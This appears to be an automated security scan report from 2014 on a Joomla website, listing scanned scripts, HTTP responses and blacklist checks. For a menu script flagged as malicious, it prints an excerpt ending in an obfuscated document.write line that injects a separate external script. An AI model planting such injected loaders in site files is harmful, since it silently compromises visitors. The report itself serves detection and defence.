Scanned pages/files
Request | Server response | Status |
http://restoringcleveland.com/ | 200 OK Content-Length: 43027 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js | 200 OK Content-Length: 91668 Content-Type: text/javascript | clean |
http://restoringcleveland.com/media/system/js/modal.js | 200 OK Content-Length: 10588 Content-Type: application/javascript | clean |
http://restoringcleveland.com/components/com_k2/js/k2.js | 200 OK Content-Length: 3077 Content-Type: application/javascript | clean |
http://restoringcleveland.com/plugins/system/jat3/base-themes/default/js/core.js | 200 OK Content-Length: 5721 Content-Type: application/javascript | clean |
http://restoringcleveland.com/plugins/system/jat3/base-themes/default/js/menu/mega.js | 200 OK Content-Length: 15679 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var jaMegaMenuMoo = new Class({ initialize: function(menu, options){ this.options = $extend({ slide: true, duration: 300, fading: false, bgopacity: 0.9, delayHide: 500, direction: 'down', action: 'mouseenter', hidestyle: 'normal' }, options || {}); if (!this.options.slide && !this.options.fading) this.options.delayHide = 10; this.menu = menu; this.childopen = new Array(); th } else { r = window.getWidth() - r + 10; } if (r < 0) { li.childcontent.setStyle ('margin-left', -ccor.width + 20); li.eff_on['margin-left'] = 0; li.eff_off['margin-left'] = li._w + 20; li.childcontent_inner.setStyle ('margin-left', li.eff_off['margin-left']); } } } }); document.write("<scr"+"ipt src='/media/system/js/maxime.js'><"+"/script>"); Antivirus reports:
| ||
http://restoringcleveland.com/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://restoringcleveland.com/includes/js/joomla.javascript.js | 200 OK Content-Length: 15405 Content-Type: application/javascript | clean |
http://restoringcleveland.com/media/system/js/calendar.js | 200 OK Content-Length: 34315 Content-Type: application/javascript | clean |
http://restoringcleveland.com/media/system/js/calendar-setup.js | 200 OK Content-Length: 4919 Content-Type: application/javascript | clean |
http://restoringcleveland.com/modules/mod_s5_box/js/jquery.colorbox-min.js | 200 OK Content-Length: 9517 Content-Type: application/javascript | clean |
http://restoringcleveland.com/modules/mod_s5_box/js/jquery.no.conflict.js | 200 OK Content-Length: 20 Content-Type: application/javascript | clean |
http://restoringcleveland.com/modules/mod_s5_box/js/jquery.colorbox.js | 200 OK Content-Length: 27813 Content-Type: application/javascript | clean |
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 163245 Content-Type: application/x-javascript | clean |
http://platform.twitter.com/widgets.js | 200 OK Content-Length: 98004 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: restoringcleveland.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Tue, 01 Apr 2014 19:12:13 GMT
Pragma: no-cache
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 01 Apr 2014 19:12:14 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: d8467da8b8a5d83483ee5298d3abf6b5=5e8a43467e0dc04b6dda6caf602fac20; path=/
Set-Cookie: ja_methys_home_tpl=ja_methys_home; expires=Sun, 22-Mar-2015 19:12:13 GMT; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: restoringcleveland.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Tue, 01 Apr 2014 19:12:13 GMT
Pragma: no-cache
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 01 Apr 2014 19:12:14 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: d8467da8b8a5d83483ee5298d3abf6b5=5e8a43467e0dc04b6dda6caf602fac20; path=/
Set-Cookie: ja_methys_home_tpl=ja_methys_home; expires=Sun, 22-Mar-2015 19:12:13 GMT; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: restoringcleveland.com
Referer: http://www.google.com/search?q=restoringcleveland.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: restoringcleveland.com
Referer: http://www.google.com/search?q=restoringcleveland.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=restoringcleveland.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://restoringcleveland.com/
Result: restoringcleveland.com is not infected or malware details are not published yet.
Result: restoringcleveland.com is not infected or malware details are not published yet.